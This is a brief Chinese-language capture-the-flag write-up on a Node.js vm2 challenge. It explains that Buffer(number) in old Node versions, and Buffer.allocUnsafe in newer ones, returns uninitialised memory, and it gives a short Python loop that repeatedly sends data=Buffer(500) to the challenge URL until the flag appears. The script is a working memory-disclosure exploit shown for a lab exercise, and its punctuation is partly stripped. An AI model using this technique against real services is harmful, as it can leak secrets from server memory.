开始就暴露了源代码到处都是vm2 我开始还在想是不是vm2沙箱逃逸的 vm2的问题版本漏洞或者rce确实是沙箱逃逸后来看了大佬的wp才知道利用的是Buffer这个函数关键的知识点是在较早一点的node版本中(8.0 之前)当Buffer的构造函数传入数字时,会得到与数字长度一致的一个Buffer并且这个Buffer是未清零的。8.0之后的版本可以通过另一个函数Buffer.allocUnsafe(size)来获得未清空的内存。一直利用buffer尝试得到含有flag的内存内容import requests import time urlhttps://75f8dbe383f05c22e6f3f7e1.http-ctf2.dasctf.com/?dataBuffer(500) while True: resrequests.get(url) print(res.status_code) time.sleep(0.1) if hitcon in res.text: print(res.text) break